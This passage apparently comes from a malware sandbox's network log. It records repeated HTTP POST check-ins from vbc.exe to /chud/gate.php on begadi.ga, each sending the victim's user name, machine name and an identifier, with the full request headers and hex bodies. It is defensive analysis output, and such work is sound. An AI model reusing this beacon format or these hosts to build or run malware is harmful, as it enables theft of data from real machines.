Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
161	192.168.2.22	49328	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:55.621685982 CET	836	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:55.680283070 CET	836	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:55.806792974 CET	836	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
162	192.168.2.22	49329	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:56.079165936 CET	837	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:56.137954950 CET	837	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:56.264152050 CET	838	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
163	192.168.2.22	49330	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:56.523449898 CET	839	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:56.582859039 CET	839	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:56.707082033 CET	839	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
164	192.168.2.22	49331	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:56.986700058 CET	840	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:57.046041965 CET	840	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:57.170484066 CET	841	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
165	192.168.2.22	49332	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:57.440232992 CET	841	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:57.505839109 CET	842	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:57.637568951 CET	842	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
166	192.168.2.22	49333	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:57.901391983 CET	843	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:57.959319115 CET	843	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:58.109519958 CET	843	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
167	192.168.2.22	49334	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:58.356885910 CET	844	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:58.422141075 CET	844	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:58.550988913 CET	845	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
168	192.168.2.22	49335	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:58.807713032 CET	845	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:58.869191885 CET	846	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:58.996237040 CET	846	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
169	192.168.2.22	49336	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:59.259529114 CET	847	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:59.318394899 CET	847	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:59.445801020 CET	847	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.22	49184	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:40.294286013 CET	638	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:40.351317883 CET	638	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:40.472325087 CET	638	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
170	192.168.2.22	49337	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:59.709543943 CET	848	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:59.771585941 CET	848	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:59.901983976 CET	849	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
171	192.168.2.22	49338	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:35:00.160897017 CET	850	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:35:00.222340107 CET	850	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:35:00.349518061 CET	850	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
172	192.168.2.22	49339	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:35:00.610924006 CET	851	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:35:00.668387890 CET	851	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:35:00.794681072 CET	852	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:35:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
173	192.168.2.22	49340	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:35:01.047354937 CET	852	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:35:01.104419947 CET	853	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:35:01.230403900 CET	853	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:35:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
174	192.168.2.22	49341	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:35:01.481208086 CET	854	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:35:01.539381981 CET	854	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:35:01.667486906 CET	854	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:35:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
175	192.168.2.22	49342	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:35:01.938677073 CET	855	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:35:01.996361017 CET	855	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:35:02.127676964 CET	856	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:35:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
176	192.168.2.22	49343	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:35:02.388885975 CET	856	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:35:02.447591066 CET	857	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:35:02.579013109 CET	857	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:35:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
177	192.168.2.22	49344	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:35:02.836599112 CET	858	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:35:02.899816990 CET	858	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:35:03.029088020 CET	858	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:35:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.22	49185	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:40.742275953 CET	639	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:40.800924063 CET	640	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:40.927834988 CET	640	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.22	49186	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:41.221610069 CET	641	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:41.285546064 CET	641	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:41.413666010 CET	641	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:33.097276926 CET	617	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 176 Connection: close
Dec 21, 2020 08:33:33.160803080 CET	618	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus701188ALBUS-PC+0DE4229FCF97F5879F50F8FD3Sbjml
Dec 21, 2020 08:33:33.289712906 CET	618	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.22	49187	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:41.708348036 CET	642	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
